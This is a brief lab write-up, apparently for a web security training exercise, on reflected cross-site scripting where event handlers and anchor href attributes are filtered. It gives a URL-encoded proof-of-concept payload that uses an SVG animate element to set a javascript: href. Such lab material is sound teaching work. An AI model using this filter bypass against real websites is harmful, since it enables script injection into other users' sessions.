Reflected XSS with event handlers and href attributes blocked
Description
The website in this lab contains a reflected XSS vulnerability with some whitelisted tags, but all events and anchor href attributes are blocked.
Reproduction and proof of concept
Visit the following URL, replacing
0aea002d04f460bbc1d2491e00ad00dawith your lab ID:
https://0aea002d04f460bbc1d2491e00ad00da.web-security-academy.net/?search=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E